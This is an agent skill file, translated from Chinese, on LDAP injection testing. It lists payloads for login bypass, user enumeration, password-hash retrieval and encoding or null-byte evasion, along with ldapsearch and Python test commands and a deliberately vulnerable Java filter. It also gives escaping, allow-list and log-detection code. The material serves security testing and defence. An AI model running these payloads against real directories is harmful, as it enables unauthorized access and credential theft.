ldap-injection-testing


Professional Skills and Methodologies for LDAP Injection Vulnerability Testing


NPX Install

npx skill4agent add ed1s0nz/cyberstrikeai ldap-injection-testing

SKILL.md Content (translated from Chinese)


LDAP Injection Vulnerability Testing

Overview

LDAP injection is a vulnerability similar to SQL injection, which exploits flaws in the construction of LDAP query statements and may lead to information disclosure, privilege bypass, etc. This skill provides methods for detection, exploitation, and prevention of LDAP injection.

Vulnerability Principle

Applications concatenate user input directly into LDAP query strings without sufficient validation and filtering, allowing an attacker to alter the query logic.
Dangerous Code Example:
java
// Vulnerable: both values are concatenated into the filter without escaping
String filter = "(&(cn=" + userInput + ")(userPassword=" + password + "))";
ldapContext.search(baseDN, filter, ...);

LDAP Basics

Query Syntax

Basic Queries:
(cn=John)
(objectClass=person)
(&(cn=John)(mail=john@example.com))
(|(cn=John)(cn=Jane))
(!(cn=John))

Special Characters

Characters Requiring Escaping:
  • ( ) - Parentheses
  • * - Wildcard
  • \ - Escape character
  • / - Path separator
  • NUL - Null character

Testing Methods

1. Identify LDAP Input Points

Common Functions:
  • User login
  • User search
  • Directory browsing
  • Permission verification

2. Basic Detection

Test Special Characters:
*)(&
*)(|
*))(
*))%00
Test Logical Operators:
*)(&(cn=*
*)(|(cn=*
*))(!(cn=*

3. Authentication Bypass

Basic Bypass:
Username: *)(&
Password: *
Query: (&(cn=*)(&)(userPassword=*))
More Precise Bypass:
Username: admin)(&(cn=admin
Password: *))
Query: (&(cn=admin)(&(cn=admin)(userPassword=*)))

4. Information Disclosure

Enumerate Users:
*)(cn=*
*)(uid=*
*)(mail=*
Retrieve Attributes:
*)(|(cn=*)(userPassword=*
*)(|(objectClass=*)(cn=*

Exploitation Techniques

Authentication Bypass

Method 1: Logical Bypass
Input: *)(&
Query: (&(cn=*)(&)(userPassword=*))
Result: Matches all users
Method 2: Comment Bypass
Input: admin)(&(cn=admin
Query: (&(cn=admin)(&(cn=admin)(userPassword=*)))
Method 3: Wildcard
Input: *)(|(cn=*)(userPassword=*
Query: (&(cn=*)(|(cn=*)(userPassword=*)(userPassword=*))

Information Disclosure

Enumerate All Users:
Search: *)(cn=*
Result: Returns all cn attributes
Retrieve Password Hashes:
Search: *)(|(cn=*)(userPassword=*
Result: Returns users and password hashes
Retrieve Sensitive Attributes:
Search: *)(|(cn=*)(mail=*)(telephoneNumber=*
Result: Returns multiple sensitive attributes

Privilege Escalation

Modify Query Logic:
Original: (&(cn=user)(memberOf=CN=Users,DC=example,DC=com))
Injection: user)(memberOf=CN=Admins,DC=example,DC=com))(|(cn=user
Result: May bypass permission checks

Bypass Techniques

Encoding Bypass

URL Encoding:
*)(& → %2A%29%28%26
*)(| → %2A%29%28%7C
Unicode Encoding:
* → \u002A
( → \u0028
) → \u0029

Comment Bypass

Using Comments:
*)(&(cn=*
*)(|(cn=*

Null Character Injection

Using NULL Byte:
*))%00
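The detection side of the payloads listed above: an added example (not part of the original skill) that URL-decodes request parameters, including the encoded and null-byte variants from the Encoding Bypass and Null Character sections, and flags values carrying unescaped filter metacharacters. The log lines and parameter names are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote

# Filter metacharacters (RFC 4515) that change meaning when they reach the
# directory unescaped; \x00 covers the null-byte truncation case.
_LDAP_META = re.compile(r"[()*\\\x00]")

def decode_param(raw):
    """URL-decode until stable, so double-encoded values (%252A) are unwrapped too."""
    prev, cur = None, raw
    while prev != cur:
        prev, cur = cur, unquote(cur)
    return cur

def suspicious_params(query_string):
    """Return {param: decoded value} for parameters carrying filter metacharacters."""
    found = {}
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        for value in values:
            decoded = decode_param(value)
            if _LDAP_META.search(decoded):
                found[name] = decoded
    return found

# Constructed access-log lines (not real traffic) that reproduce the page's
# payloads in plain, URL-encoded and null-byte form.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /login?user=alice&pass=secret HTTP/1.1" 200',
    '10.0.0.7 - - "GET /login?user=%2A%29%28%26&pass=%2A HTTP/1.1" 200',
    '10.0.0.9 - - "GET /search?cn=admin%29%28%26%28cn%3Dadmin HTTP/1.1" 200',
    '10.0.0.9 - - "GET /search?cn=%2A%29%29%00 HTTP/1.1" 500',
]

_REQUEST = re.compile(r'"(?:GET|POST) (\S+?)(?:\?(\S*))? HTTP/')

def scan_log(lines):
    """Return (client, path, flagged params) for each request that looks injected."""
    hits = []
    for line in lines:
        match = _REQUEST.search(line)
        if not match or not match.group(2):
            continue
        flagged = suspicious_params(match.group(2))
        if flagged:
            hits.append((line.split()[0], match.group(1), flagged))
    return hits

if __name__ == "__main__":
    for client, path, params in scan_log(SAMPLE_LOG):
        print(f"{client} {path} {params}")
```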

Tool Usage

JXplorer

Graphical LDAP Client:
  • Connect to LDAP server
  • Browse directory structure
  • Execute query tests

ldapsearch

bash
# Basic Query
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)"

# Test Injection
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)(&"

Burp Suite

  1. Intercept LDAP query requests
  2. Modify query parameters
  3. Observe response results

Python Script

python
import ldap3
from ldap3.core.exceptions import LDAPInvalidFilterError

server = ldap3.Server('ldap://target.com')
conn = ldap3.Connection(server, authentication=ldap3.SIMPLE,
                        user='cn=admin,dc=example,dc=com',
                        password='password')
# The connection is not established until bind() is called
if not conn.bind():
    raise SystemExit(f'bind failed: {conn.result}')

# Test Injection
filter_str = '*)(&'
try:
    # ldap3 parses the filter locally, so a malformed fragment is rejected
    # by the client before it is ever sent to the server
    conn.search('dc=example,dc=com', filter_str)
    print(conn.entries)
except LDAPInvalidFilterError as exc:
    print('filter rejected by client-side parser:', exc)

Verification and Reporting

Verification Steps

  1. Confirm control over LDAP queries
  2. Verify authentication bypass or information disclosure
  3. Assess impact (unauthorized access, data leakage, etc.)
  4. Record complete POC

Report Key Points

  • Vulnerability location and input parameters
  • LDAP query construction method
  • Complete exploitation steps and PoC
  • Fix recommendations (input validation, parameterized queries, etc.)

Prevention Measures

Recommended Solutions

  1. Input Validation
    java
    import java.util.Arrays;

    // Characters that must be escaped before a value is placed in a search filter
    private static final String[] LDAP_ESCAPE_CHARS = 
        {"\\", "*", "(", ")", "\0", "/"};
    
    // Escape each special character as a backslash plus its two-digit hex code,
    // the form RFC 4515 requires inside search filters (a bare "\*" is not valid there)
    public static String escapeLDAP(String input) {
        if (input == null) {
          return null;
        }
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < input.length(); i++) {
          char c = input.charAt(i);
          if (Arrays.asList(LDAP_ESCAPE_CHARS).contains(String.valueOf(c))) {
            sb.append(String.format("\\%02x", (int) c));
          } else {
            sb.append(c);
          }
        }
        return sb.toString();
    }
  2. Parameterized Queries
    java
    // Use the LDAP API's filter-argument mechanism instead of string concatenation
    String filter = "(&(cn={0})(userPassword={1}))";
    Object[] args = {escapedCN, escapedPassword};
    // Build the query through the API, e.g. JNDI: ctx.search(baseDN, filter, args, searchControls)
  3. Whitelist Validation
    java
    // Only allow specific characters
    if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
        throw new IllegalArgumentException("Invalid input");
    }
  4. Least Privilege
    • Use accounts with minimal privileges for LDAP connections
    • Restrict queryable attributes
    • Use access control lists
  5. Error Handling
    • Do not return detailed error information
    • Use unified error responses
    • Record error logs
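To tie the prevention measures back to the dangerous concatenation shown under Vulnerability Principle, here is an added example (not code from the original skill) in Python: the vulnerable filter builder beside a hardened one that applies RFC 4515 hex escaping, plus an allow-list check mirroring the page's regex. The inputs are the page's basic bypass payload; the function names are this example's own.

```python
import re

# RFC 4515 escaping for values placed inside a search filter: each special
# character becomes a backslash followed by its two-digit hex code.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28",
                   ")": r"\29", "\0": r"\00", "/": r"\2f"}

def escape_filter_value(value):
    """Escape a user-supplied value so the directory matches it literally."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)

def build_filter_vulnerable(username, password):
    """The concatenation pattern from the page: input can rewrite the filter."""
    return "(&(cn=" + username + ")(userPassword=" + password + "))"

def build_filter_safe(username, password):
    """Same query shape, but every value is escaped before insertion."""
    return ("(&(cn=" + escape_filter_value(username)
            + ")(userPassword=" + escape_filter_value(password) + "))")

# Hypothetical allow-list for the login form, mirroring the page's regex.
_ALLOWED = re.compile(r"[a-zA-Z0-9@._-]+")

def validate_username(username):
    """Reject anything outside the allow-list before it reaches the directory."""
    return _ALLOWED.fullmatch(username) is not None

if __name__ == "__main__":
    # Constructed input: the page's basic bypass payload.
    print(build_filter_vulnerable("*)(&", "*"))   # filter logic rewritten by the input
    print(build_filter_safe("*)(&", "*"))         # metacharacters neutralised
    print(validate_username("*)(&"))              # False
```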

Notes

  • Only perform in authorized testing environments
  • Note syntax differences between different LDAP servers
  • Avoid impacting the directory during testing
  • Understand the target LDAP server configuration